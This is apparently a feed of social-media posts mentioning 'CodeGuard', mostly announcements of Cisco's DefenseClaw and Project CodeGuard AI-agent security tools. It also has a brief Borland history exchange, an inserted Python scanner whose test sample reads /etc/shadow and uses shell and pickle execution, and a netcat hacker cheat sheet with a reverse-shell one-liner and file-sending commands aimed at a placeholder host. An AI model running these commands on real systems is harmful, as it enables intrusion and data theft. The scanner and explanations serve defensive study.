Jun 13
Replying to @mohno
Originally it was the two lines ・CodeGuard for Borland C++ 4.5J ・Borland PowerPack for DOS, and I guess something went wrong while I was trying to delete something (・ω<) teehee, something like that. For the history of Borland C/C++, the 'CB Magazine' one might be better. blogs.itmedia.co.jp/mohno/CB…
Jun 13
Replying to @ht_deko @mohno
Belatedly, but I thought the 'CodeGuard for Borland C++ 4.5J' entry in [ボーランド言語製品履歴] (Borland language product history) was, judging by its content, a mistake for 'Borland PowerPack for DOS' (^^;A [ボーランド言語製品履歴] web.archive.org/web/19970603…
DefenseClaw — Security Governance for AI Agents & MCP Ecosystems 🛡️💀

A defensive security platform designed to govern, inspect, and audit agentic AI runtimes before and during execution. Built by Cisco AI Defense for organizations deploying AI agents, MCP servers, plugins, and autonomous workflows.

• Admission control for skills, MCP servers, plugins & generated code
• Runtime inspection of prompts, completions & tool calls
• Built-in CodeGuard static analysis
• OpenShell sandbox integration
• External registry ingestion (Smithery, Skills.sh, Git, ClawHub)
• Policy-based blocking and enforcement
• SQLite, JSONL, OTLP & Splunk audit logging
• Operator CLI, TUI dashboard & observability stack

Key capabilities:
🔍 Scan AI capabilities before execution
🛡️ Enforce runtime guardrails and policies
📊 Generate durable audit evidence for compliance and investigations
⚙️ Monitor agent behavior, tool usage, and sandbox activity in real time

Designed for enterprises building secure AI agent infrastructure and MCP-powered ecosystems.

🔗 github.com/cisco-ai-defense/…

#AISecurity #CyberSecurity #AgenticAI #MCP #LLMSecurity #OpenClaw #DevSecOps #InfoSec #Cisco #ArtificialIntelligence
Agent tools shouldn't run first and get reviewed later.

DefenseClaw is a security governance layer for OpenClaw and agentic AI runtimes. It helps you scan untrusted agent capabilities before use, inspect runtime traffic, and keep durable audit evidence when policy decisions matter.

Key features:
• Admission control – scans skills, MCP servers, plugins, and generated code before they run
• Runtime guardrails – inspects prompts, completions, and tool calls with rules, policy, optional LLM judge, and Cisco AI Defense inspection
• CodeGuard checks – looks for secrets, dangerous execution, unsafe deserialization, weak crypto, injection patterns, and risky file access
• OpenShell sandbox support – adds network, filesystem, syscall, and policy controls for Linux sandbox setups
• Audit and observability – exports evidence through SQLite, JSONL, OTLP, Splunk HEC, webhooks, and TUI views

It's open-source (Apache 2.0 license). Link in the reply 👇
**Bringing Enterprise Grade Security and Guardrails to NetClaw: A 3-Ring Security Architecture**

When you give an AI agent access to your network infrastructure, security isn't optional - it's essential. Today I'm excited to share how we've made NetClaw enterprise-ready with a 3-ring defense-in-depth architecture combining NVIDIA OpenShell and Cisco DefenseClaw.

---

**The 3 Rings:**

**Ring 1: NVIDIA OpenShell**
Container-based sandbox isolation. NetClaw runs in a Docker container with:
- Isolated file system, network, and process namespaces
- YAML-based network policies - deny by default
- Only explicitly allowed APIs are reachable (Slack, LLMs, your MCPs)

**Ring 2: Cisco DefenseClaw**
Runtime guardrails that inspect everything:
- Scans ALL skills and MCPs with CodeGuard before execution
- Inspects every LLM prompt and completion (7 AI providers)
- Filters all tool calls through 6 security rule categories
- Full audit logging with SIEM export

**Ring 3: NetClaw**
Your AI network engineer, now running in a protected environment with full audit trails.

---

**Why This Matters:**

We scanned all 186 NetClaw skills and 56 MCP servers with DefenseClaw. Every skill now declares its required MCPs. Every MCP was tested for:
- Hardcoded credentials
- Shell injection vectors
- SQL injection vulnerabilities
- Unsafe deserialization

Defense-in-depth means if one layer fails, the others still protect you.

---

**One Command to Deploy:**

```
./scripts/netclaw-secure-start.sh
```

That's it. OpenShell gateway, DefenseClaw guardrails, sandbox creation, config migration, network policy - all automated.

---

**The Result:**

An AI agent that can automate your network with the security posture your enterprise requires:
- Container isolation
- Runtime inspection
- Compliance logging
- SIEM integration

youtu.be/rDpgEVsZGH0

---

NetClaw: AI-powered network automation with enterprise-grade security.

#NetworkAutomation #AISafety #EnterpriseSecurity #DevOps #Cisco #NVIDIA #AIAgent #InfrastructureAsCode #Compliance #NetOps #LLM #Claude #Anthropic #OpenShell #DefenseClaw #ContainerSecurity #RuntimeSecurity #AuditLogging #SIEM #Splunk #Datadog
Cisco has announced DefenseClaw, a security governance tool for AI agent frameworks, timed with RSA Conference 2026.

It is a response to OpenClaw, which launched in November 2025, spread explosively in late January, and by the end of January was expanding rapidly with no governance in place; NVIDIA had likewise announced NemoClaw, a software stack for the OpenClaw ecosystem, at GTC 2026. DefenseClaw is scheduled to be published as OSS on GitHub on March 27.

Behind this is Cisco's own finding that only 5% of enterprise agentic AI projects have made it from testing into production, and its view that the absence of a governance layer is holding back adoption.

[DefenseClaw overview]
・A security layer embedded into agent environments such as OpenClaw, designed to work with NVIDIA's OpenShell sandbox and Cisco's own scanning tools (Skills Scanner, MCP Scanner, AI BoM, CodeGuard, etc.)
・Three functions: (1) pre-execution scanning of skills, plugins and agent-generated code; (2) runtime monitoring of agents' input and output messages; (3) blocking of blocklisted skills and MCP servers through an admission gate
・Cisco AI Defense: Explorer Edition, announced at the same time, provides multi-turn adversarial testing that probes the models and agent applications driving agent workflows for resistance to prompt injection and jailbreaks
・Also released: an extension of Cisco Secure Access that applies zero-trust identity verification and access control per agent, and a runtime SDK that embeds policy enforcement from the development stage onward
・Cisco's announcements at the same RSAC 2026 also include enhanced agent capabilities for the SOC built on Splunk, but that is a separate announcement from DefenseClaw itself

Similar efforts are under way at security vendors such as Palo Alto Networks and Zscaler, DevOps players such as JFrog and GitLab, and also Anthropic, OpenAI and Google, so this is a crowded field. How far Cisco's existing share of enterprise networking will serve as a differentiator is an open question, but given how fast ecosystems like OpenClaw are growing, building out the governance layer looks set to remain urgent.
newsroom.cisco.com/c/r/newsr…
Cisco just redefined agent security at RSA 2026 Day 1.

The stat that matters: 85% of enterprises experiment with AI agents. Only 5% deploy them. The gap? Security.

Cisco's answer — three pillars:

1️⃣ Protect the world FROM agents
→ Zero Trust Access extended to agents
→ Agent Identity Management in Duo (register agents, map to human owners)
→ MCP gateway routing ALL tool traffic — no blind spots
→ Identity Intelligence discovers shadow agents

2️⃣ Protect agents FROM the world
→ AI Defense: Explorer Edition (free red-teaming)
→ Multi-turn adversarial testing for agentic workflows
→ DefenseClaw: open-source framework (Skills Scanner, MCP Scanner, AI BoM, CodeGuard)
→ Integrates with NVIDIA OpenShell sandbox

3️⃣ Respond at machine speed
→ Splunk agentic SOC: automated triage, detection, malware reversing
→ Agents defending against agents

The architecture insight: "AI agents aren't just making work faster — they're a new workforce of co-workers."

New co-workers need onboarding. Identity. Accountability. Access control. Cisco's treating agents like employees — not tools. Every agent mapped to a human manager. Time-bound access. Intent-aware monitoring. MCP policy enforcement.

This is the ten-layer defense stack completed: runtime → network → identity → browser → hardware attestation → data-layer → agentic graph → autonomous SOC → network observability → Zero Trust agent IAM

None existed as products 12 months ago. All shipping now.

#AIAgents #RSA2026 #ZeroTrust
Your coding agent has no idea what secure code looks like. @Cisco built CodeGuard to change that. Two things that make it work: 1. security skills packaged as context for any coding agent 2. works across Cursor, Windsurf, Claude Code Full episode in comments.
Feb 25
Your AI coding agent learned from millions of lines of code, including insecure ones. That means by default, it can write vulnerable code too. So how do you fix that?

@JohnGroetzinger, Principal Engineer at @Cisco, built CodeGuard, a security skills layer that teaches coding agents how to write and review code securely. He tested it against real scenarios. The result: 84% success rate vs 47% baseline. Nearly 2× improvement.

In this episode we get into:
• how CodeGuard works
• why Cisco open sourced it
• the surprisingly simple method that gets agents to fix their own mistakes

Try CodeGuard: cisco/software-security on the Tessl registry.

(0:00) Trailer
(2:07) Introduction
(4:46) Defining Code Guard: Security Skills for AI
(6:33) AI Culture at Cisco: Balancing Creativity & Security
(7:55) The Evolution of Tooling vs. LLM Models
(9:09) From OWASP Rules to Agent Skills
(12:48) Challenges of Distribution Across Different IDEs
(15:48) Tips for Increasing Agent Skill Activation
(20:25) Measuring Success: The Tessl Evaluation Journey
(24:41) Navigating Enterprise-Grade Security Scenarios
(28:15) How to Build an AI Skill from Scratch
(31:59) The Future of Code Guard & Open Source
Major milestone: @Cisco has donated Project CodeGuard to the Coalition for Secure AI (CoSAI), an OASIS Open Project.
CodeGuard - Security Skills and Rules for AI Coding Agents - github.com/cosai-oasis/proje…

Project CodeGuard is an AI model-agnostic security coding agent skills framework and ruleset that embeds secure-by-default practices into AI coding workflows (generation and review). It ships core security skills and rules, translators for popular coding agents, and validators to test skills and rule compliance.

Why Project CodeGuard? AI coding agents are transforming software engineering, but this speed can introduce security vulnerabilities. Is your AI coding agent implementation introducing security vulnerabilities?
• Skipping input validation
• Hardcoding secrets and credentials
• Using weak cryptographic algorithms
• Relying on unsafe functions
• Missing authentication/authorization checks
• Missing any other security best practice

Project CodeGuard solves this by embedding security best practices directly into AI coding agent workflows.
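The DefenseClaw, NetClaw and Project CodeGuard posts above all list the same families of pre-execution checks (hard-coded secrets, dangerous execution, unsafe deserialization, weak crypto, injection patterns, risky file access). The script below is an added illustration of what such an admission-control scan looks like over a Python skill; it is not DefenseClaw's or Project CodeGuard's own code, the rule names and the two sample skills are constructed for the example, and the patterns are deliberately narrow (the real tools carry far larger rule sets).

```python
"""Illustrative admission-control scanner for a Python agent skill.
Added example: rule names, patterns and sample skills are constructed here,
not taken from DefenseClaw or Project CodeGuard."""
import ast
import re
from dataclasses import dataclass

# Textual checks for credentials committed into the skill (constructed patterns).
SECRET_PATTERNS = {
    "aws-access-key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "assigned-secret": re.compile(
        r"(?i)\b(password|passwd|api[_-]?key|secret|token)\s*=\s*['\"][^'\"]{8,}['\"]"),
}

# Fully qualified callee -> rule it violates.
DANGEROUS_CALLS = {
    "eval": "dangerous-exec", "exec": "dangerous-exec",
    "os.system": "dangerous-exec", "os.popen": "dangerous-exec",
    "pickle.load": "unsafe-deserialization", "pickle.loads": "unsafe-deserialization",
    "marshal.loads": "unsafe-deserialization",
    "hashlib.md5": "weak-crypto", "hashlib.sha1": "weak-crypto",
}
SENSITIVE_PREFIXES = ("/etc/", "/root/", "/proc/")


@dataclass(frozen=True)
class Finding:
    rule: str
    line: int
    detail: str


def _qualname(node: ast.AST) -> str:
    """Render `pkg.mod.func` from a Name/Attribute chain; '' for anything else (e.g. a call result)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _kw(call: ast.Call, name: str):
    return next((k.value for k in call.keywords if k.arg == name), None)


def _is_dynamic_string(node: ast.AST) -> bool:
    """f-strings, %-formatting, .format() and + concatenation: data is being glued into the query."""
    if isinstance(node, ast.JoinedStr):
        return True
    if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Mod, ast.Add)):
        return True
    return isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute) and node.func.attr == "format"


def scan_source(src: str) -> list[Finding]:
    findings: list[Finding] = []
    for lineno, text in enumerate(src.splitlines(), 1):
        for rule, pat in SECRET_PATTERNS.items():
            if pat.search(text):
                findings.append(Finding("hardcoded-secret", lineno, rule))
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = _qualname(node.func)
        if name in DANGEROUS_CALLS:
            findings.append(Finding(DANGEROUS_CALLS[name], node.lineno, name))
        shell = _kw(node, "shell")  # subprocess.*(…, shell=True) hands the string to /bin/sh
        if name.startswith("subprocess.") and isinstance(shell, ast.Constant) and shell.value is True:
            findings.append(Finding("dangerous-exec", node.lineno, f"{name}(shell=True)"))
        if name == "yaml.load":  # full loader can instantiate arbitrary objects
            loader = _kw(node, "Loader")
            if loader is None or _qualname(loader) not in {"yaml.SafeLoader", "SafeLoader"}:
                findings.append(Finding("unsafe-deserialization", node.lineno, "yaml.load without SafeLoader"))
        if name.endswith(".execute") and node.args and _is_dynamic_string(node.args[0]):
            findings.append(Finding("injection", node.lineno, "SQL built from a formatted string"))
        if name == "os.chmod" and len(node.args) > 1:
            mode = node.args[1]
            if isinstance(mode, ast.Constant) and isinstance(mode.value, int) and mode.value & 0o002:
                findings.append(Finding("risky-file-access", node.lineno, "world-writable chmod"))
        if name == "open" and node.args and isinstance(node.args[0], ast.Constant) \
                and str(node.args[0].value).startswith(SENSITIVE_PREFIXES):
            findings.append(Finding("risky-file-access", node.lineno, f"opens {node.args[0].value}"))
    return sorted(findings, key=lambda f: f.line)


def admission_decision(src: str) -> tuple[str, list[Finding]]:
    """Policy for the admission gate: any finding blocks the skill from being loaded."""
    findings = scan_source(src)
    return ("block" if findings else "allow"), findings


# Constructed sample skills: one that should be rejected, one that should pass.
BAD_SKILL = '''\
import os, pickle, hashlib, subprocess, sqlite3
API_KEY = "sk-live-0123456789abcdef"
def run(cmd, blob, user):
    subprocess.run(cmd, shell=True)
    state = pickle.loads(blob)
    digest = hashlib.md5(blob).hexdigest()
    cur = sqlite3.connect("skill.db").cursor()
    cur.execute(f"SELECT * FROM users WHERE name = '{user}'")
    os.chmod("/tmp/out", 0o777)
    return open("/etc/shadow").read()
'''

CLEAN_SKILL = '''\
import subprocess, hashlib, json
def run(cmd, blob, user, cur):
    subprocess.run(["ls", "-l", cmd])
    state = json.loads(blob)
    digest = hashlib.sha256(blob).hexdigest()
    cur.execute("SELECT * FROM users WHERE name = ?", (user,))
    return state, digest
'''

if __name__ == "__main__":
    for label, src in (("bad", BAD_SKILL), ("clean", CLEAN_SKILL)):
        verdict, found = admission_decision(src)
        print(label, verdict, [(f.rule, f.line, f.detail) for f in found])
```

The AST walk is what keeps the execution and deserialization checks from being fooled by formatting; the secret check stays regex-based because credentials also appear in comments, config strings and non-Python files. A real admission gate would additionally resolve aliased imports (`from pickle import loads as l`) and follow data flow, which this example does not.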
AI coding tools hallucinate. Everyone knows it. Nobody fixed it. So I built CodeGuard — a truth-anchored memory layer that sits between Claude and your codebase. Point it at a folder → 198 files → 11,898 verified facts → ask anything. If it can't prove it, it won't say it. Watch it run live 👇
Finally, we can scale AI code generation without scaling our security debt. Project CodeGuard gives us the framework: Model-Agnostic Security Ruleset 🛡️ Automated Guardrails for Gen & Review ✅ This isn't an add-on; it's the required foundation for enterprise AI development. 🔗 Link in the first comment 👇
Jan 20
Secure #AI #coding is critical for resilient AI ecosystems. Cisco’s open-source Project CodeGuard sets a new standard. Learn more from Cisco Distinguished Engineer Omar Santos ➡️ cs.co/6017C44Ol
#EACL 2026 #Hot Start to the year 🎉 Excited to share that our paper “CodeGuard: Improving LLM Guardrails in CS Education” has been accepted to Findings of EACL 2026 🇲🇦 (Rabat, Morocco • Mar 24–29, 2026) 🗓️
26 Dec 2025
#Pysec Netcat's Mastery: A Hacker's Swiss Army Knife 🔪 📖

Connection and Scanning:
nc [IP] [port] — connect to the host.
nc -lnvp 4444 — listen for incoming connections.
nc -z [IP] 20-100 — quickly scan ports.
nc -u [IP] [port] — work over UDP.

File Transfer:
nc -l -p 4444 > file.txt — receive the file.
nc [IP] 4444 < file.txt — send the file.

Reverse Shell:
nc -e /bin/bash [IP] 4444 — send a shell.
nc -lnvp 4444 — catch a shell on your side.

Debugging:
nc -vz [IP] 443 — check if the port is open.
echo "GET /" | nc site.com 80 — manual HTTP request.

Flags:
-n — do not resolve DNS.
-v — detailed output.
-w 3 — timeout of 3 seconds.
-k — do not close after disconnection.

Fact: Netcat was written in 1995 by the hacker Hobbit. It's so versatile that it's called the "TCP/IP Swiss Army Knife". 😈

CodeGuard: PySec Edition | Chat
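The cheat sheet above lists the nc one-liners without saying what happens on the wire. The following is an added example, not part of the post and not the nc binary: a plain-socket model of three of those commands (`-z` probing, `nc -l > file` / `nc < file` transfer, and the hand-typed HTTP request) run against loopback listeners, so the mechanics can be seen offline. Ports and the stand-in HTTP responder are constructed for the demonstration.

```python
"""Socket-level model of the nc one-liners, run over 127.0.0.1.
Added illustration; this is not netcat and the listeners here stand in for the remote side."""
import socket
import threading


def _listen_ephemeral():
    """The `nc -l` side: bind a listening socket on 127.0.0.1 and return (sock, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # port 0: kernel picks a free port for the demo
    srv.listen(1)
    return srv, srv.getsockname()[1]


def _recv_until_eof(conn):
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:                    # peer half-closed: this is what lets `nc -l > file` exit
            break
        chunks.append(data)
    return b"".join(chunks)


def send_bytes(host, port, payload, timeout=5.0):
    """`nc HOST PORT < file`: connect, write everything, then half-close so the receiver sees EOF."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)


def zero_io_scan(host, ports, timeout=0.3):
    """`nc -z HOST LO-HI`: one TCP connect() per port, no payload; returns the ports that accepted."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 = handshake completed, else an errno (ECONNREFUSED, ...)
                open_ports.append(port)
    return open_ports


def http_status_line(host, port, path="/", timeout=5.0):
    """`echo "GET /" | nc HOST 80`: hand-written HTTP/1.0 request, returns the server's status line."""
    request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        s.shutdown(socket.SHUT_WR)
        return _recv_until_eof(s).split(b"\r\n", 1)[0].decode()


# --- loopback demonstrations: a thread plays the remote `nc -l` side ---

def demo_transfer(payload: bytes) -> bytes:
    """`nc -l -p PORT > file` on one side, `nc 127.0.0.1 PORT < file` on the other."""
    srv, port = _listen_ephemeral()
    received = {}

    def receiver():
        conn, _ = srv.accept()
        with conn:
            received["data"] = _recv_until_eof(conn)

    t = threading.Thread(target=receiver, daemon=True)
    t.start()
    send_bytes("127.0.0.1", port, payload)
    t.join(5.0)
    srv.close()
    return received["data"]


def demo_scan():
    """Probe one listening port and one port that was just released; returns (open_ports, listening_port)."""
    srv, listening = _listen_ephemeral()
    released_sock, released = _listen_ephemeral()
    released_sock.close()                # nothing listens here any more -> connect() is refused
    try:
        return zero_io_scan("127.0.0.1", [listening, released]), listening
    finally:
        srv.close()


def demo_http() -> str:
    """A throwaway HTTP/1.0 responder stands in for `site.com 80`."""
    srv, port = _listen_ephemeral()

    def responder():
        conn, _ = srv.accept()
        with conn:
            _recv_until_eof(conn)        # read the request up to the client's half-close
            conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok")

    t = threading.Thread(target=responder, daemon=True)
    t.start()
    try:
        return http_status_line("127.0.0.1", port)
    finally:
        t.join(5.0)
        srv.close()


if __name__ == "__main__":
    print(demo_transfer(b"hello from nc"))
    print(demo_scan())
    print(demo_http())
```

Two points the one-liners hide: `-z` never sends data, so a port that accepts the handshake and immediately closes still counts as open; and the file-transfer recipe only terminates because the sender half-closes after the payload (the `shutdown(SHUT_WR)` here), which is why an nc that does not close its write side after stdin EOF appears to hang. Note also that `-e` exists in traditional/GNU netcat and in Ncat but not in the OpenBSD nc shipped by many distributions.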